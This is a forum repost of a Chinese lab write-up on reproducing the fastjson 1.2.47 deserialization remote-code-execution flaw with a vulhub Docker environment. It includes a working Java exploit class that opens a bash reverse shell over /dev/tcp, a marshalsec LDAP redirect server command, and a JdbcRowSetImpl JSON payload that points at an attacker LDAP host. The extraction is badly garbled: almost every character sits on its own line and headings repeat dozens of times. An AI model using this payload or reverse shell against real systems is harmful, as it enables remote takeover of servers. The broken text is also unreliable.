论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
逆向
[6654] 2020-04-20_fastjson1.2.47反序列化漏洞复现
文档创建者:
s7ckTeam
浏览次数:
10
最后更新:
2025-01-17
逆向
10 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前在线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2020-04-20_fastjson1.2.47反序列化漏洞复现
f
a
s
t
j
s
o
n
1
.
2
.
4
7
反
序
列
化
漏
洞
复
现
E
安
全
2
0
2
0
-
0
4
-
2
0
以
下
文
章
来
源
于
雷
神
众
测
,
作
者
十
一
N
o
.
1
N
o
.
1
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
由
于
传
播
、
利
用
此
文
所
提
供
的
信
息
而
造
成
的
任
何
直
接
或
者
间
接
的
后
果
及
损
失
,
均
由
使
用
者
本
人
负
责
,
雷
神
众
测
以
及
文
章
作
者
不
为
此
承
担
任
何
责
任
。
雷
神
众
测
拥
有
对
此
文
章
的
修
改
和
解
释
权
。
如
欲
转
载
或
传
播
此
文
章
,
必
须
保
证
此
文
章
的
完
整
性
,
包
括
版
权
声
明
等
全
部
内
容
。
未
经
雷
神
众
测
允
许
,
不
得
任
意
修
改
或
者
增
减
此
文
章
内
容
,
不
得
以
任
何
方
式
将
其
用
于
商
业
目
的
。
N
o
.
2
N
o
.
2
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
背
景
这
个
漏
洞
爆
去
年
就
爆
出
来
了
,
一
直
没
做
啥
研
究
,
最
近
工
作
中
发
现
一
个
应
用
是
用
来
f
a
s
t
j
s
o
n
1
.
2
.
4
7
的
j
a
r
包
。
便
准
备
复
现
一
下
该
漏
洞
。
N
o
.
3
N
o
.
3
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
环
境
准
备
主
机
A
:
模
拟
F
a
s
t
j
s
o
n
漏
洞
环
境
(
c
e
n
t
o
s
8
)
主
机
B
:
模
拟
攻
击
机
(
w
i
n
d
o
w
s
1
0
)
主
机
C
:
搭
设
R
M
I
或
者
L
D
A
P
服
务
以
及
w
e
b
服
务
(
c
e
n
t
o
s
8
)
先
准
备
主
机
A
环
境
。
这
里
我
直
接
使
用
v
u
l
h
u
b
的
漏
洞
环
境
,
需
要
安
装
d
o
c
k
e
r
,
d
o
c
k
e
r
-
c
o
m
p
o
s
e
等
命
令
。
d
o
c
k
e
r
安
装
参
考
h
t
t
p
s
:
/
/
w
w
w
.
j
i
a
n
s
h
u
.
c
o
m
/
p
/
7
5
8
c
1
7
0
b
9
5
1
f
在
C
e
n
t
O
S
8
上
安
装
d
o
c
k
e
r
第
三
步
会
报
错
,
在
后
边
加
上
-
-
n
o
b
e
s
t
就
好
了
。
y
u
m
i
n
s
t
a
l
l
-
y
d
o
c
k
e
r
-
c
e
-
-
n
o
b
e
s
t
d
o
c
k
e
r
-
c
o
m
p
o
s
e
安
装
参
考
h
t
t
p
s
:
/
/
v
u
l
h
u
b
.
o
r
g
/
#
/
d
o
c
s
/
i
n
s
t
a
l
l
-
d
o
c
k
e
r
-
o
n
e
-
c
l
i
c
k
/
安
装
完
成
后
,
就
可
以
直
接
将
g
i
t
h
u
b
上
的
v
u
l
h
u
b
下
载
下
来
雷
神
众
测
雷
神
众
测
.
雷
神
众
测
,
专
注
于
渗
透
测
试
技
术
及
全
球
最
新
网
络
攻
击
技
术
的
分
析
。
进
入
f
a
s
t
j
s
o
n
/
1
.
2
.
4
7
-
r
c
e
/
目
录
下
,
执
行
d
o
c
k
e
r
-
c
o
m
p
o
s
e
u
p
-
d
访
问
h
t
t
p
:
/
/
i
p
:
8
0
9
0
这
样
漏
洞
环
境
就
准
备
好
了
。
N
o
.
4
N
o
.
4
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
漏
洞
利
用
本
地
环
境
工
具
准
备
j
d
k
:
链
接
:
h
t
t
p
s
:
/
/
p
a
n
.
b
a
i
d
u
.
c
o
m
/
s
/
1
n
I
-
J
T
9
3
v
j
c
A
9
-
-
7
f
b
0
f
h
q
w
&
s
h
f
l
=
s
h
a
r
e
s
e
t
提
取
码
:
s
v
e
n
安
装
参
考
h
t
t
p
s
:
/
/
w
w
w
.
c
n
b
l
o
g
s
.
c
o
m
/
x
i
o
a
w
u
-
b
l
o
g
/
p
/
9
0
9
7
2
9
4
.
h
t
m
l
工
具
:
m
a
r
s
h
a
l
s
e
c
,
需
要
用
m
v
n
打
包
一
下
,
建
议
直
接
使
用
打
包
好
的
。
g
i
t
h
u
b
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
m
b
e
c
h
l
e
r
/
m
a
r
s
h
a
l
s
e
c
链
接
(
已
打
包
好
)
:
h
t
t
p
s
:
/
/
p
a
n
.
b
a
i
d
u
.
c
o
m
/
s
/
1
k
T
9
v
w
h
N
D
D
d
i
J
3
d
L
9
B
S
3
U
4
w
&
s
h
f
l
=
s
h
a
r
e
s
e
t
提
取
码
:
s
v
e
n
将
下
面
代
码
保
存
为
S
h
e
l
l
.
j
a
v
a
文
件
。
反
弹
s
h
e
l
l
_
E
x
p
:
i
m
p
o
r
t
j
a
v
a
.
i
o
.
B
u
f
f
e
r
e
d
R
e
a
d
e
r
;
i
m
p
o
r
t
j
a
v
a
.
i
o
.
I
n
p
u
t
S
t
r
e
a
m
;
i
m
p
o
r
t
j
a
v
a
.
i
o
.
I
n
p
u
t
S
t
r
e
a
m
R
e
a
d
e
r
;
p
u
b
l
i
c
c
l
a
s
s
E
x
p
l
o
i
t
{
p
u
b
l
i
c
E
x
p
l
o
i
t
(
)
t
h
r
o
w
s
E
x
c
e
p
t
i
o
n
{
P
r
o
c
e
s
s
p
=
R
u
n
t
i
m
e
.
g
e
t
R
u
n
t
i
m
e
(
)
.
e
x
e
c
(
n
e
w
S
t
r
i
n
g
[
]
{
"
/
b
i
n
/
b
a
s
h
"
,
"
-
c
"
,
"
e
x
e
c
5
<
>
/
d
e
v
/
t
c
p
/
i
p
/
p
o
r
t
;
c
a
t
<
&
5
|
w
h
i
l
e
r
e
a
d
l
i
n
e
;
d
o
$
l
i
n
e
2
>
&
5
>
&
5
;
d
o
n
e
"
}
)
;
I
n
p
u
t
S
t
r
e
a
m
i
s
=
p
.
g
e
t
I
n
p
u
t
S
t
r
e
a
m
(
)
;
B
u
f
f
e
r
e
d
R
e
a
d
e
r
r
e
a
d
e
r
=
n
e
w
B
u
f
f
e
r
e
d
R
e
a
d
e
r
(
n
e
w
I
n
p
u
t
S
t
r
e
a
m
R
e
a
d
e
r
(
i
s
)
)
;
S
t
r
i
n
g
l
i
n
e
;
w
h
i
l
e
(
(
l
i
n
e
=
r
e
a
d
e
r
.
r
e
a
d
L
i
n
e
(
)
)
!
=
n
u
l
l
)
{
S
y
s
t
e
m
.
o
u
t
.
p
r
i
n
t
l
n
(
l
i
n
e
)
;
}
p
.
w
a
i
t
F
o
r
(
)
;
i
s
.
c
l
o
s
e
(
)
;
r
e
a
d
e
r
.
c
l
o
s
e
(
)
;
p
.
d
e
s
t
r
o
y
(
)
;
}
p
u
b
l
i
c
s
t
a
t
i
c
v
o
i
d
m
a
i
n
(
S
t
r
i
n
g
[
]
a
r
g
s
)
t
h
r
o
w
s
E
x
c
e
p
t
i
o
n
{
}
}
使
用
j
a
v
a
c
S
h
e
l
l
.
j
a
v
a
将
代
码
编
译
成
c
l
a
s
s
文
件
。
在
该
目
录
使
用
p
y
t
h
o
n
-
m
S
i
m
p
l
e
H
t
t
p
S
e
r
v
e
r
8
0
9
0
开
启
一
个
w
e
b
服
务
。
访
问
提
示
可
以
下
载
就
好
了
。
接
下
来
使
用
m
a
r
s
h
a
l
s
e
c
工
具
快
捷
的
开
启
L
D
A
P
服
务
。
借
助
L
D
A
P
服
务
将
L
D
A
P
r
e
f
e
r
e
n
c
e
r
e
s
u
l
t
重
定
向
到
w
e
b
服
务
器
。
这
里
的
i
p
和
端
口
,
是
你
w
e
b
服
务
的
i
p
端
口
j
a
v
a
-
c
p
m
a
r
s
h
a
l
s
e
c
-
0
.
0
.
3
-
S
N
A
P
S
H
O
T
-
a
l
l
.
j
a
r
m
a
r
s
h
a
l
s
e
c
.
j
n
d
i
.
L
D
A
P
R
e
f
S
e
r
v
e
r
h
t
t
p
:
/
/
i
p
:
8
0
9
0
#
S
h
e
l
l
1
3
8
9
p
a
y
l
o
a
d
:
{
"
a
"
:
{
"
@
t
y
p
e
"
:
"
j
a
v
a
.
l
a
n
g
.
C
l
a
s
s
"
,
"
v
a
l
"
:
"
c
o
m
.
s
u
n
.
r
o
w
s
e
t
.
J
d
b
c
R
o
w
S
e
t
I
m
p
l
"
}
,
"
b
"
:
{
"
@
t
y
p
e
"
:
"
c
o
m
.
s
u
n
.
r
o
w
s
e
t
.
J
d
b
c
R
o
w
S
e
t
I
m
p
l
"
,
"
d
a
t
a
S
o
u
r
c
e
N
a
m
e
"
:
"
l
d
a
p
:
/
/
i
p
:
1
3
8
9
/
S
h
e
l
l
"
,
"
a
u
t
o
C
o
m
m
i
t
"
:
t
r
u
e
N
o
.
5
N
o
.
5
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
坑
点
1
.
主
机
A
需
要
关
闭
防
火
墙
,
否
则
无
法
使
用
L
D
A
P
服
务
s
y
s
t
e
m
c
t
l
s
t
o
p
f
i
r
e
w
a
l
l
d
;
2
.
防
火
墙
关
闭
,
需
要
重
启
d
o
c
k
e
r
s
e
r
v
i
c
e
d
o
c
k
e
r
r
e
s
t
a
r
t
漏
洞
环
境
也
需
要
重
新
启
动
一
下
;
3
.
j
d
k
版
本
需
要
注
意
,
下
方
图
片
j
d
k
版
本
不
存
在
此
漏
洞
。
注
:
本
文
由
E
安
全
编
译
报
道
,
转
载
请
注
原
文
地
址
h
t
t
p
s
:
/
/
w
w
w
.
e
a
s
y
a
q
.
c
o
m
推
荐
阅
读
:
案
例
分
析
:
用
U
E
B
A
解
决
E
q
u
i
f
a
x
的
失
陷
凭
证
问
题
美
国
政
府
问
责
办
公
室
(
G
A
O
)
报
告
|
国
防
部
并
没
有
解
决
基
本
网
络
安
全
盲
点
遭
G
A
O
批
评
C
I
S
O
数
据
安
全
分
级
分
类
实
践
指
南
W
i
n
d
o
w
s
严
重
蠕
虫
漏
洞
将
破
坏
全
球
的
商
业
网
络
!
国
泰
航
空
被
处
以
I
C
O
5
0
万
英
镑
最
高
罚
款
因
数
据
泄
露
长
达
四
年
之
久
▼
点
击
“
阅
读
原
文
”
查
看
更
多
精
彩
内
容
喜
欢
记
得
打
赏
小
E
哦
!
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
逆向